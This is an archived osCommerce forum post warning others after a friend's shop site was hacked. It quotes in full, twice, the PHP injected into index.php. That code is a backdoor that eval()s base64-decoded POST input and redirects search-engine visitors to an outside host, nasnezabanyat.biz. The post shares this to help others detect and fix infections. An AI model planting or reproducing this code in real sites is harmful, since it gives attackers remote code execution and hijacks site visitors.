Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Site hacked!


spufus

Recommended Posts

A friend of mine had his site hacked yesterday.

 

I found index.php had permissions changed to 777 & this in the top line of index.php

 

<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://nasnezabanyat.biz/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=&...;.$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=&...;.$_SERVER['HTTP_HOST']);die();}} ?><?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://nasnezabanyat.biz/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=&...;.$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=&...;.$_SERVER['HTTP_HOST']);die();}} ?><?php

/*

 

Fixed in a couple of mins & no other files affected.

 

Just a warning to others to be careful.

 

I think he's using an old version of OSC - reckon he'll be upgrading now!!

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...